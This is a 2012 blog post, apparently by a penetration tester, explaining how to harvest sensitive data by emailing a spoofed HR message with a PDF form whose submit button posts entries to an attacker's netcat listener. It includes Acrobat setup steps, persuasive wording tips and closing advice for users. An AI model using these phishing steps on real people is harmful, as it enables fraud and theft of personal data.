Tuesday, June 5, 2012

PDF Pwnage

During many penetration tests the need to social engineer a target may be required. You could send targets all kinds of payloads or malicious things but sometimes that gets picked up by anti-virus. Also, sometimes getting ‘shell’ may not be in the rules of engagement.
Let’s talk about something that completely relies on the user being conned into following the attackers instructions. The scenario is simple send the user a PDF form and have them submit the form. The attack can be broken down into three main steps.
  1. Create the form
  2. Spoof an email
  3. Wait for the results
There are many ways to make this form, this is just how I did it.
First create a form and make it believable.
Word form
Next import it into Acrobat and select create PDF form.

Acrobat will do some magic and on the right hand side click add new field -> OK button. A blue box will show up and place it anywhere you want. This is your submit button. Click properties and on the options tab set the label to submit. Finally under the actions tab select the trigger to be mouse down. Select the action of Submit a form and click add and fill out the appropriate information.  ***If you are doing this over an insecure network use HTTPS please**

Save the document and then get ready to send it. In this example I would spoof it from an human resources person. Also if you don’t know how to spoof an email you shouldn’t even be reading this.
Finally, we fire up our listener this could be just netcat or write your own listener. Thanks @kaospunk for the quick and dirty POC.
Why will this attack be successful?
  • The victim will be more relaxed due to the spoofed email.
  • If the email is worded carefully using words like ‘we’, ‘help’ and ‘required’ these types of words cause psychological effects on people making them more apt to follow instructions.
  • No Anti-Virus will be triggered, which relaxes the user more.
  • The words in the document “Please, use the submit button to ensure secure delivery of your information.” Enforce the “trustworthiness’ of the message.
  • When a link is clicked in Adobe reader it always asks if the user wants to allow the connection. This inherently trains users to click allow without reading
  • It’s easy. Let’s face it users are lazy.
Here is the result of a successful test attack.

How could the user have protected themself?
  • Anytime a document requests sensitive information verify the source or sender.
  • If the requested action seems out of the ordinary verify the source or sender.
  • When the submit button is hit a warning pops up like the image below, verify the address the document is going to.

Good Luck!

No comments:

Post a Comment